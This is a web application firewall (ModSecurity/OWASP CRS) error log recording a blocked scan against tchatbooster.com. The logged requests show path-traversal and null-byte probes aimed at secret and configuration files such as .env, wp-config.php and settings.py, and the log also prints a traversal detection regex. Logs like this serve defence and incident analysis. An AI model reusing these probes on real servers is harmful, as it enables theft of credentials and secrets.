[Tue May 12 04:39:19.425576 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.166:57184] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.dev"] [unique_id "agKS13o6NvB9WXx5V-6e2QAAARE"], referer: https://tchatbooster.com/.env.dev
[Tue May 12 04:39:19.425790 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.166:57184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.dev"] [unique_id "agKS13o6NvB9WXx5V-6e2QAAARE"], referer: https://tchatbooster.com/.env.dev
[Tue May 12 04:39:19.758040 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.166:37396] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS13o6NvB9WXx5V-6e2AAAAQE"], referer: https://tchatbooster.com/static../../wp-config.php
[Tue May 12 04:39:19.784784 2026] [security2:error] [pid 1825179:tid 1825209] [client 45.148.10.166:56982] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKS19r1yOh9TvizeziP0QAAAEs"]
[Tue May 12 04:39:19.785014 2026] [security2:error] [pid 1825179:tid 1825209] [client 45.148.10.166:56982] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKS19r1yOh9TvizeziP0QAAAEs"]
[Tue May 12 04:39:20.108320 2026] [security2:error] [pid 1825287:tid 1825307] [client 45.148.10.166:57220] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 31 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS1wgpmE1yW0glLdgfMAAAAMI"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:20.135573 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.166:57172] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2AgpmE1yW0glLdgfMQAAAMw"]
[Tue May 12 04:39:20.135624 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.166:57172] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2AgpmE1yW0glLdgfMQAAAMw"]
[Tue May 12 04:39:20.135656 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.166:57172] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2AgpmE1yW0glLdgfMQAAAMw"]
[Tue May 12 04:39:20.135855 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.166:57172] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2AgpmE1yW0glLdgfMQAAAMw"]
[Tue May 12 04:39:20.135920 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.166:57172] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2AgpmE1yW0glLdgfMQAAAMw"]
[Tue May 12 04:39:20.135963 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.166:57172] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2AgpmE1yW0glLdgfMQAAAMw"]
[Tue May 12 04:39:20.136378 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.166:57172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2AgpmE1yW0glLdgfMQAAAMw"]
[Tue May 12 04:39:20.260249 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.166:57184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS13o6NvB9WXx5V-6e2QAAARE"], referer: https://tchatbooster.com/.env.dev
[Tue May 12 04:39:20.334878 2026] [security2:error] [pid 1825179:tid 1825218] [client 45.148.10.166:37408] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.example"] [unique_id "agKS2Nr1yOh9TvizeziP0gAAAFQ"]
[Tue May 12 04:39:20.335180 2026] [security2:error] [pid 1825179:tid 1825218] [client 45.148.10.166:37408] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.example"] [unique_id "agKS2Nr1yOh9TvizeziP0gAAAFQ"]
[Tue May 12 04:39:20.698404 2026] [security2:error] [pid 1825287:tid 1825312] [client 43.130.101.151:59694] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2026/01/Roue-Libre-extrait-site-2.mp3"] [unique_id "agKS2AgpmE1yW0glLdgfMwAAAMc"]
[Tue May 12 04:39:20.727614 2026] [security2:error] [pid 1825179:tid 1825209] [client 45.148.10.166:56982] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS19r1yOh9TvizeziP0QAAAEs"]
[Tue May 12 04:39:20.986160 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.166:57172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS2AgpmE1yW0glLdgfMQAAAMw"]
[Tue May 12 04:39:21.020638 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2c1tk6y7yBJLpJopqgAAAIw"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:21.020708 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:Referer outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2c1tk6y7yBJLpJopqgAAAIw"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:21.020737 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2c1tk6y7yBJLpJopqgAAAIw"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:21.020765 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2c1tk6y7yBJLpJopqgAAAIw"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:21.020965 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2c1tk6y7yBJLpJopqgAAAIw"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:21.021021 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2c1tk6y7yBJLpJopqgAAAIw"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:21.021061 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2c1tk6y7yBJLpJopqgAAAIw"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:21.021401 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 31)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2c1tk6y7yBJLpJopqgAAAIw"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:21.111746 2026] [security2:error] [pid 1825179:tid 1825218] [client 45.148.10.166:37408] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS2Nr1yOh9TvizeziP0gAAAFQ"]
[Tue May 12 04:39:21.394101 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.example"] [unique_id "agKS2dr1yOh9TvizeziP0wAAAFY"], referer: https://tchatbooster.com/.env.example
[Tue May 12 04:39:21.394325 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.example"] [unique_id "agKS2dr1yOh9TvizeziP0wAAAFY"], referer: https://tchatbooster.com/.env.example
[Tue May 12 04:39:21.506592 2026] [security2:error] [pid 1825179:tid 1825218] [client 45.148.10.166:37408] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/settings.py"] [unique_id "agKS2dr1yOh9TvizeziP1AAAAFQ"]
[Tue May 12 04:39:21.506807 2026] [security2:error] [pid 1825179:tid 1825218] [client 45.148.10.166:37408] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/settings.py"] [unique_id "agKS2dr1yOh9TvizeziP1AAAAFQ"]
[Tue May 12 04:39:21.743567 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 31 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS2c1tk6y7yBJLpJopqgAAAIw"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:21.766768 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2QgpmE1yW0glLdgfNQAAAMY"]
[Tue May 12 04:39:21.766823 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2QgpmE1yW0glLdgfNQAAAMY"]
